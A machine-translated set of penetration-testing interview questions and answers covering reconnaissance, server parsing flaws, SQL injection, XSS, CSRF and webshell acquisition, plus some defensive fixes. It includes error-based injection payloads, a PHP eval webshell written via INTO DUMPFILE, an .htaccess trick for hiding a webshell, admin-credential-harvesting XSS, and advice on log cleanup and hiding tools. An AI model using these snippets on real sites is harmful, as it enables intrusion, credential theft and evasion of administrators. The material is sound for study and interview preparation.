The following are the interview questions involved in various aspects of network security. The more stars, the greater the probability of problems appearing. I wish you all can find a satisfactory job.
Note: This set of interview questions has been compiled into a pdf document, but the content is still being updated, because it is impossible to cover all the interview questions anyway, and more people still hope to fill in the gaps by pointing to the surface.
1. When you get a station to be tested, what do you think should be done first?
1.1 Information Collection
① Obtain the whois information of the domain name, obtain the registrant's email address, name and phone number, etc.
② Query the server side station and the sub-domain name site, because the main website is generally more difficult, so first check whether there are any common cms or other loopholes in the side station.
③ Check the server operating system version and web middleware to see if there are known vulnerabilities, such as IIS, APACHE, and NGINX parsing vulnerabilities
④ Check the IP, scan the IP address port, and detect the vulnerability of the corresponding port, such as rsync, Heartbleed, mysql, ftp, ssh weak password, etc.
⑤ Scan the directory structure of the website to see if the directory can be traversed, or sensitive files are leaked, such as php probes
⑥ google hack to further detect website information, background, sensitive files
1.2 Vulnerability scanning
Start to detect vulnerabilities, such as XSS, XSRF, sql injection, code execution, command execution, unauthorized access, directory reading, arbitrary file reading, downloading, file inclusion, remote command execution, weak passwords, uploading, editor vulnerabilities, brute force cracking wait
1.3 Exploitation
Use the above methods to get webshell, or other permissions
1.4 Privilege Escalation
Privilege escalation server, such as udf privilege escalation of mysql under windows, serv-u privilege escalation, vulnerabilities of lower versions of windows, such as iis6, pr, Brazilian barbecue, linux dirty cow vulnerability, linux kernel version vulnerability escalation of privilege, mysql system under linux Privilege escalation and oracle low privilege escalation
1.5 Log Cleanup
1.6 Summary report and repair plan
2. What is the significance of judging the CMS of the website for penetration?
Find program vulnerabilities that have been exposed on the Internet.
If it is open source, you can also download the corresponding source code for code auditing.
3. For a mature and relatively safe CMS, what is the meaning of scanning the directory when infiltrating?
Sensitive files, secondary directory scanning
Misoperations by the webmaster, such as: the compressed files of the website backup, description.txt, and the secondary directory may store other sites
4. Common web server containers.
IIS、Apache、nginx、Lighttpd、Tomcat
5. Mysql injection point, use tools to directly write a sentence to the target station, what conditions are required?
root permissions and the absolute path of the website.
6. Which versions of containers are currently known to have parsing vulnerabilities, with specific examples.
IIS 6.0
/xx.asp/xx.jpg "xx.asp" is the folder name
IIS 7.0/7.5
By default, Fast-CGI is enabled. Enter /1.php directly after the image address in the url, and the normal image will be parsed as php
Nginx
The version is less than or equal to 0.8.37, the exploit method is the same as IIS 7.0/7.5, and it can also be exploited when Fast-CGI is disabled.
Null byte code xxx.jpg.php
Apache
The uploaded file is named: test.php.x1.x2.x3, Apache judges the suffix from right to left
lighttpd
xx.jpg/xx.php, incomplete, please feel free to add in the comments, thank you!
7. How to manually quickly judge whether the target station is a windows server or a linux server?
Linux is case sensitive, windows is not case sensitive.
8. Why is there only one port 80 open for a mysql database station?
Changed the port, it didn't scan out.
Station library separation.
Port 3306 is not open to the outside world
9. Several situations where 3389 cannot be connected
Port 3389 is not open
port is modified
Protection interception
In the intranet (requires port forwarding)
10. How to escape characters during breakthrough injection?
wide character injection
hex encoding bypass
11. What should I do first when I see an editor in a background news editing interface?
Look at the name version of the editor, then search for open vulnerabilities.
12. Get a webshell and find that there is a .htaccess file in the root directory of the website. What can we do?
There are many things that can be done, using hidden net horses as an example:
insert
SetHandler application/x-httpd-php
.jpg files are parsed into .php files.
It’s hard to go into details about other specific things. It is recommended that you search for sentences by yourself.
13. Injecting a vulnerability can only check the account password?
As long as the authority is wide, drag the library to get old.
14. Will SafeDog track variables to find out that it is a one-sentence Trojan horse?
It is based on the feature code, so it is easy to bypass, as long as you have a broad mind, you can go around the dog to the point of joy, but this should not be static.
15. Access scans out the database files with the suffix of asp, accessing garbled characters, how to realize the local use? **
Thunder download, directly change the suffix to .mdb.
16. Choose a readable and writable directory when escalating rights, why try not to use directories with spaces?
Because most exp executions require spaces to define parameters
17. A server has sites A and B, why add a test user in the background of A to access the background of B. Found that the test user was also added?
Same database.
18. Is it possible to directly order by to start injection without using and or or or xor when injecting?
and/or/xor, the previous 1=1, 1=2 steps are just to judge whether it is an injection point. If it is already determined to be an injection point, then you can save that step.
19. An anti-injection system will prompt when injecting:
The system has detected that you have illegal injection behavior.
Your ip xx.xx.xx.xx has been recorded
Time: 2016:01-23
Submit page: test.asp id=15
Submit content: and 1=1
20. How to use this anti-injection system to get the shell?
Submit a sentence directly in the URL, so that the website will also record your sentence into the database file. At this time, you can try to find the configuration file of the website and directly link it to the kitchen knife.
21. What are the solutions when accessing garbled characters after uploading to Malaysia?
Change the encoding in the browser.
22. What is the point of reviewing the elements of the upload point?
The limitation of the uploaded file type of some sites is implemented on the front end, and at this time, as long as the upload type is increased, the limitation can be broken.
23. The target station prohibits registered users, just enter the user name in the password recovery area and prompt: "This user does not exist", how do you think this is used?
First blast the username, and then use the blasted username to blast the password.
In fact, some sites will also prompt like this at the login
Injection is possible in all places where there is interaction with the database.
24. The target station found that the download address of a certain txt is http://www.test.com/down/down.php file=/upwdown/1.txt, what do you think?
This is the legendary download bug! After file=, try to enter index.php to download his homepage file, and then continue to search the configuration files of other websites in the homepage file, you can find out the website's database password and database address.
25. A gives you a target site, and tells you that there is a /abc/ directory under the root directory, and there are editor and admin directories under this directory. What are your thoughts?
Scan sensitive files and directories directly under the website's secondary directory /abc/.
26. In the case of a shell, how to use xss to achieve long-term control of the target station?
Add a section of js to record the login account password at the background login, and judge whether the login is successful. If the login is successful, record the account password in a file with an uncommon path or send it directly to your own website file. (This method is suitable for valuable networks that require deep control permissions).
Insert XSS scripts in files that are only accessible after login.
27. At the place where the administrator password is modified in the background, the original password is displayed as *. How do you think it will be possible to read out the user's password?
Review the element and change the password attribute at the password to text to display it in plain text
28. There is no protection on the target station, uploading pictures can be accessed normally, but uploading script format access is 403. What is the reason?
There are many reasons. It is possible that the web server configuration writes the upload directory to death and does not execute the corresponding script. Try changing the suffix name to bypass
29. Check the element to know the protection software used by the website, how do you think it is done?
When sensitive operations are blocked and the protection cannot be determined through the interface information, F12 can see the content in the name of the HTML body such as Patronus.
30. What is the purpose of creating a .zhongzi folder in the win2003 server?
Hidden folder, in order to prevent the administrator from discovering the tools you uploaded.
31. SQL injection has the following two test options, choose one and explain the reasons for not choosing the other:
A. demo.jsp id=2+1 B. demo.jsp id=2-1
Option B, + represents a space in URL encoding, which may cause confusion
32. There is a sql injection vulnerability in the following link. What do you think about this deformed injection?
demo.do DATA=AjAxNg==
DATA may be base64-encoded before being sent to the server, so we also need to base64-encode the parameters to complete the test correctly
33. Found demo.jsp uid=110 injection point, what are your ideas to get webshell, which one is the best?
If you have write permission, you can use using INTO OUTFILE to construct a joint query statement to redirect the output of the query to a file in the system, so that it can be written into the WebShell
The principle of using sqlmap –os-shell is the same as the above one, to directly obtain a Shell, which is more efficient
Obtain the account and password of the website administrator by constructing a joint query statement, then scan the background to log in to the background, and then upload the Shell in the background by changing the package and uploading.
34. What is the difference between CSRF, XSS and XXE, and how to fix them?
XSS is a cross-site scripting attack. Codes can be constructed in the data submitted by users to execute, so as to realize attacks such as stealing user information. Repair method: escape character entities, use HTTP Only to prohibit JavaScript from reading cookie values, verify input, and use the same character encoding for browsers and web applications.
CSRF is a cross-site request forgery attack. XSS is one of many means to realize CSRF. It is because there is no confirmation whether the key operation is initiated by the user voluntarily. Repair method: filter out the pages that need to prevent CSRF and then embed Token, enter the password again, and check the Referer
XXE is an XML external entity injection attack. In XML, entities can be called to request local or remote content. Similar to remote file protection, it will cause related security issues, such as reading sensitive files. Repair method: The XML parsing library strictly prohibits the parsing of external entities when it is called.
35. What is the difference between CSRF, SSRF and replay attacks?
CSRF is a cross-site request forgery attack initiated by the client
SSRF is Server Side Request Forgery, initiated by the server
Replay attack is to replay the intercepted data packets to achieve identity authentication and other purposes
36. Name at least three business logic vulnerabilities and how to fix them?
36.1 There is a password recovery vulnerability
① The password allows brute force cracking,
② There is a general-purpose retrieval certificate,
③ You can skip the verification step,
④ To retrieve the credentials, you can obtain the password through the password retrieval function provided by the manufacturer by intercepting packets and other methods.
36.2 The most common identity authentication vulnerability is
① Session fixation attack
② Cookie counterfeiting: As long as you get Session or Cookie, you can forge the user's identity.
36.3 Captcha vulnerability exists
① The verification code allows brute force cracking
② The verification code can be bypassed by Javascript or by changing the package
37. Circle the items that may have problems in the following conversations, and mark the possible problems?
get /ecskins/demo.jsp uid=2016031900&keyword=”hello world”
HTTP/1.1Host:.com:82User-Agent:Mozilla/
5.0 Firefox/40Accept:text/css,/;q=0.1
Accept-Language:zh-CN;zh;q=0.8;en-US;q=0.5,en;q=0.3
Referer:http://**.com/eciop/orderForCC/
cgtListForCC.htm zone=11370601&v=145902
Cookie:myguid1234567890=1349db5fe50c372c3d995709f54c273d;
uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ;
st_uid=N90PLYHLZGJXI-NX01VPUF46W;
status=True
Connection:keep-alive
38, sqlmap, how to inject an injection point?
38.1 If it is a get model, directly, sqlmap -u "such as point URL".
38.2 If it is a post type such as a point, you can use sqlmap -u "injection point URL" –data="post parameter"
38.3 If it is a cookie, X-Forwarded-For, etc., when it is accessible, use burpsuite to capture the packet, replace the injection site with a number, put it in the file, and then sqlmap -r "file address"
39. How many types of sql injection?
39.1 Error injection
39.2 bool type injection
39.3 Delayed injection
39.4 Wide byte injection
40. How to judge delayed injection?
if(ascii(substr(“hello”, 1, 1))=104, sleep(5), 1)
41. What do blind injection and delayed injection have in common?
It is a character-by-character judgment
42. How to get the webshell of a website?
Upload, edit templates in the background, sql injection write files, command execution, code execution, some cms vulnerabilities that have been exposed, such as dedecms background can directly create script files, wordpress upload plug-ins include script files zip archives, etc.
43. What are the functions for error injection? 10
43.1 and extractvalue(1, concat(0x7e,(select @@version),0x7e))】】】———
43.2 Rounding down by floor error reporting
43.3 +and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)
43.4 geometrycollection()select from test where id=1 and geometrycollection((select from(selectfrom(select user())a)b));
43.5 multipoint()select from test where id=1 and multipoint((select from(select from(select user())a)b));
43.6 polygon()select from test where id=1 and polygon((select from(select from(select user())a)b));
43.7 multipolygon()select from test where id=1 and multipolygon((select from(select from(select user())a)b));
43.8 linestring()select from test where id=1 and linestring((select from(select from(select user())a)b));
43.9 ultilinestring()select from test where id=1 and multilinestring((select from(select from(select user())a)b));
43.10 exp()select from test where id=1 and exp(~(select * from(select user())a));
44. In addition to the onerror attribute of the img tag, is there any other way to obtain the administrator path?
src specifies a remote script file to get referer
45. In addition to the onerror attribute of the img tag, and the suffix name of the src attribute must end with .jpg, how to get the administrator path.
45.1 The remote server modifies the apache configuration file and configures the .jpg file to parse AddType application/x-httpd-php .jpg in php
45.2 <img src=http://xss.tv/1.jpg> will be parsed in php
46. What are the functions of sql injection to write files?
select 'sentence' into outfile 'path'
select 'sentence' into dumpfile 'path'
select ‘< php eval($_POST[1]) >’ into dumpfile ‘d:\wwwroot\baidu.com\nvhack.php’;
47. How to prevent CSRF
47.1 Verify referer
47.2 Verify token
Details: http://cnodejs.org/topic/5533dd6e9138f09b629674fd
48. What are the owasp vulnerabilities?
48.1 SQL injection protection methods:
48.2 Broken Authentication and Session Management
48.3 Cross-site scripting attack XSS
48.4 Direct References to Unsafe Objects
48.5 Security configuration error
48.6 Sensitive Information Disclosure
48.7 Lack of Function-Level Access Control
48.8 Cross Site Request Forgery CSRF
48.9 Using Components with Known Vulnerabilities
48.10 Unauthenticated Redirects and Forwards
49. SQL injection protection method?
49.1 Using a secure API
49.2 Perform Escape escape processing on the input special characters
49.3 Using whitelists to normalize input validation methods
49.4 Control the input of the client, and do not allow the input of special characters related to SQL injection
49.5 The server side filters, escapes, replaces, and deletes special characters before submitting to the database for SQL query.
50. What are the functions of code execution, file reading, and command execution?
50.1 代码执行:eval,preg_replace+/e,assert,call_user_func,call_user_func_array,create_function
50.2 File reading: file_get_contents(), highlight_file(), fopen(), readfile(), fread(), fgetss(), fgets(), parse_ini_file(), show_source(), file(), etc.
50.3 Command execution: system(), exec(), shell_exec(), passthru(), pcntl_exec(), popen(), proc_open()
If you need a pdf version, please pay attention to automatic acquisition
epilogue
The network security industry is like a river and lake, where people of all colors gather. Compared with many decent families with solid foundations in European and American countries (understand encryption, know how to protect, can dig holes, and are good at engineering), our talents are more heretics (many white hats may not be convinced), so in the future Talent training and In terms of construction, it is necessary to adjust the structure and encourage more people to do "positive" "system and construction" that combines "business" and "data" and "automation" in order to quench the thirst for talents and truly serve the society in an all-round way. Internet provides security.